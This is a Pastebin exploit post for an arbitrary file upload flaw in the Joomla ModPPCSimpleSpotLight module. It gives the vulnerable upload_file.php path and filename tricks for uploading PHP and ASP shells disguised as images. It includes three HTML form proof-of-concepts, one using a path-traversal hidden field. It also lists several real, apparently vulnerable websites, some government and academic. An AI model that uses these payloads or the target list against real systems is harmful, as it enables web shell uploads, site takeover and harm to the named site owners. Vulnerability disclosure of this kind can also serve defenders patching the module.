Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################################################################
- # Exploit Title : Joomla ModPPCSimpleSpotLight Modules 1.2/3.0 CSRF Backdoor Access Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/03/2019
- # Vendor Homepage : pixelpointcreative.com
- # Software Download Link : pixelpointcreative.com/joomla/downloads/category/40-simple-spotlight
- # Software Information Link : extensions.joomla.org/extension/simple-spotlight/
- bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,1547/Itemid,95/
- # Software Version : 1.2 and 3.0
- # Software Price Type : Free/Paid Download
- # Solution : Upgrade and Update to 3.1 or higher version
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030020
- ###############################################################################
- # Description about Software :
- ***************************
- Simple spotlight is a jQuery image rotator with navigation for Joomla.
- ###############################################################################
- # Impact :
- ***********
- Joomla ModPPCSimpleSpotLight 1.2/3.0 versions is prone to an arbitrary file upload vulnerability.
- An attacker may leverage this issue to upload arbitrary files to the affected computer; this can
- result in arbitrary code execution within the context of the vulnerable application.
- Weaknesses in this category are related to the management of permissions, privileges,
- and other security features that are used to perform access control.
- ###############################################################################
- # Arbitrary File Upload / Unauthorized File Insertation / Shell Upload Backdoor Access Exploit :
- **********************************************************************************
- /modules/mod_ppc_simple_spotlight/elements/upload_file.php
- # Directory File Path :
- *********************
- /modules/mod_ppc_simple_spotlight/img/.......
- # Note : It is possible to upload shell files like this =>
- Sh3LL.php.gif - Sh3LL.php;.gif - Sh3LL.asp;.jpeg
- Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv
- .jpg .jpeg .gif .png
- It says : File Uploaded Successfully!
- ###############################################################################
- Cross Site Request Forgery Exploits :
- **********************************
- CSRF Exploiter PoC 1 =>
- ************************
- <form action="example.com/[PATH]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post" enctype="multipart/form-data" >
- <input name="Images" type="file" class="submit" size="80">
- <input type="submit" value="Upload !">
- </form>
- ###############################################################################
- CSRF Exploiter PoC 2 =>
- *************************
- <form enctype="multipart/form-data"
- action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">
- Your File: <input name="upload_file" type="file" /><br />
- <input type="hidden" name="dir_icons" value="../../../../">
- <input type="submit" value="upload" />
- </form>
- ###############################################################################
- CSRF Exploiter PoC 3 =>
- *************************
- </script>
- <form name="newad" method="post" enctype="multipart/form-data" action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">
- <table>
- <tr>
- <td>
- <input type="file" name="image">
- </td>
- </tr>
- <tr>
- <td>
- <input name="Submit" type="submit" value="Upload image">
- <input type="button" value="Close" onclick="javascript: refreshParent()">
- </td>
- </tr>
- </table>
- </form>
- ###############################################################################
- # Example Vulnerable Sites :
- *************************
- [+] velb.com.br/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- [+] chambre-hotes-lyon.fr/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- [+] doc.ncnu.edu.tw/rnd/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- [+] hjasin.moh.gov.my/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- [+] lce.ac.ls/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- [+] esg.edu.ar/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- [+] launion.go.cr/modules/mod_ppc_simple_spotlight/elements/upload_file.php
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement